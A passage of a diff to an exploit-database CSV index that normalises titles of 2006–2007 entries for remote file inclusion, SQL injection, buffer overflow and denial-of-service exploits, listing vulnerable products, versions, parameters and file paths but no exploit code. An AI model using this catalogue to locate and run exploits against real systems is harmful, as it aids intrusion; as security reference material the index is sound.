Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 +2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 @@ -2147,11 +2147,11 @@ id,file,description,date,author,platform,type,port 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 -2451,platforms/php/webapps/2451.txt,"PHPMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 +2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - 'phpbb_root_path' Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 -2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 +2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - (display.php) SQL Injection",2006-09-29,Trex,php,webapps,0 2457,platforms/php/webapps/2457.php,"UBB.Threads 6.5.1.1 - (doeditconfig.php) Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (1)",2006-09-29,"YAG KOHHA",windows,remote,0 @@ -2219,7 +2219,7 @@ id,file,description,date,author,platform,type,port 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 -2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - PPT Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0 +2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 @@ -2265,7 +2265,7 @@ id,file,description,date,author,platform,type,port 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0 2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0 -2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation",2006-10-16,"Marco Ivaldi",solaris,local,0 +2569,platforms/solaris/local/2569.sh,"Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation",2006-10-16,"Marco Ivaldi",solaris,local,0 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0 2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 @@ -2334,7 +2334,7 @@ id,file,description,date,author,platform,type,port 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - Constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0 +2641,platforms/solaris/local/2641.sh,"Solaris 10 (libnspr) - Constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps,0 @@ -2365,7 +2365,7 @@ id,file,description,date,author,platform,type,port 2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028 -2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components - 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 +2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Inclusion",2006-10-29,"Mehmet Ince",php,webapps,0 2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,php,webapps,0 @@ -2536,7 +2536,7 @@ id,file,description,date,author,platform,type,port 2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 -2855,platforms/windows/dos/2855.py,"3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 +2855,platforms/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 @@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 -2865,platforms/windows/remote/2865.rb,"3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 +2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 @@ -2559,14 +2559,14 @@ id,file,description,date,author,platform,type,port 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 -2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0 +2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Inclusion",2006-12-03,GregStar,php,webapps,0 -2887,platforms/windows/remote/2887.pl,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 +2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 @@ -2627,11 +2627,11 @@ id,file,description,date,author,platform,type,port 2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - (main.inc.php) Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0 -2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 +2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 -2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 +2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 @@ -2684,7 +2684,7 @@ id,file,description,date,author,platform,type,port 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - (admin/admin_settings.php) Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 -3007,platforms/php/webapps/3007.txt,"Irokez CMS 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 @@ -2694,7 +2694,7 @@ id,file,description,date,author,platform,type,port 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 -3017,platforms/php/webapps/3017.php,"PHP-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 +3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 @@ -2804,18 +2804,18 @@ id,file,description,date,author,platform,type,port 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 -3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 +3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 -3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69 +3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143 3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 3138,platforms/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 -3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21 +3140,platforms/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 @@ -2845,7 +2845,7 @@ id,file,description,date,author,platform,type,port 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x - Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 -3170,platforms/windows/remote/3170.pm,"3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 +3170,platforms/windows/remote/3170.pm,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 3173,platforms/osx/local/3173.rb,"Apple Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 @@ -2876,7 +2876,7 @@ id,file,description,date,author,platform,type,port 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b - (ains_main.php ains_path) Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 -3203,platforms/php/webapps/3203.txt,"FdScript 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 +3203,platforms/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps,0 @@ -2937,8 +2937,8 @@ id,file,description,date,author,platform,type,port 3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - (pms.php) SQL Injection",2007-02-03,rgod,php,webapps,0 3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - (exif.php lib_path) Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 -3264,platforms/windows/remote/3264.pl,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 -3265,platforms/windows/remote/3265.pm,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 +3264,platforms/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 +3265,platforms/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - (previewtheme.php inc_path) Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 @@ -2966,7 +2966,7 @@ id,file,description,date,author,platform,type,port 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 -3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 +3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 @@ -2987,12 +2987,12 @@ id,file,description,date,author,platform,type,port 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,php,webapps,0 3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 -3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 +3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) SQL Injection",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti - 'id' SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 -3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 -3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 +3319,platforms/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 +3320,platforms/windows/remote/3320.pl,"MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 @@ -3007,7 +3007,7 @@ id,file,description,date,author,platform,type,port 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 -3335,platforms/windows/remote/3335.pm,"Ipswitch WS_FTP 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 +3335,platforms/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - (nsbypass.php) Blind SQL Injection",2007-02-20,DarkFig,php,webapps,0 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure",2007-02-20,DarkFig,php,webapps,0 @@ -3046,7 +3046,7 @@ id,file,description,date,author,platform,type,port 3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,php,webapps,0 3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File 